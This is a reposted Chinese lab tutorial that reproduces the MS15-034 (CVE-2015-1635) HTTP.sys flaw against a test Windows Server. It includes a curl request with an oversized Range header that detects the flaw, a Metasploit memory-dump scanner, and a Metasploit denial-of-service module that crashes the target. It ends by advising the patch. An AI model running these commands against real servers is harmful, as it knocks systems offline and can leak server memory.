漏洞复现MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞
漏洞描述:在2015年4月安全补丁日,微软发布的众多安全更新中,修复了HTTP.sys中一处允许远程执行代码漏洞,编号为:CVE-2015-1635(MS15-034 )。利用HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。根据公告显示,该漏洞对服务器系统造成了不小的影响,主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
漏洞影响范围:IIS 7.0以上的Windows 7/8/8.1和Windows Server 2008 R2/Server 2012/Server 2012 R2等操作系统。
一、环境搭建
攻击机:kali (192.168.2.129)
服务机:windows Server 2008 R2 (192.168.2.130)
win2008安装web服务
kali访问成功
二、漏洞验证
验证1.
kali终端输入
curl -v http://192.168.2.130 -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"
返回状态码为416且出现The requested range is not satisfiable.则表示该漏洞存在。
验证2.
使用kali的msfconsole框架进行扫描
-
msfconsole
-
msf6> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
-
msf6> set rhosts 192.168.2.130 //目标地址
-
msf6> run
三、漏洞利用
注意事项:该利用会导致目标机器蓝屏重启,请谨慎使用!
使用msfconsole框架进行利用
-
msfconsole
-
-
msf6> use auxiliary/dos/http/ms15_034_ulonglongadd
-
-
msf6> set rhosts 192.168.2.130
-
-
msf6> set threads 10
-
-
msf6> run
四、修补漏洞
打微软官方补丁。
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhgabihe
系列文章
更多
同类精品
更多
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
怎样阻止微信小程序自动打开
PHP中文网 06-13 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01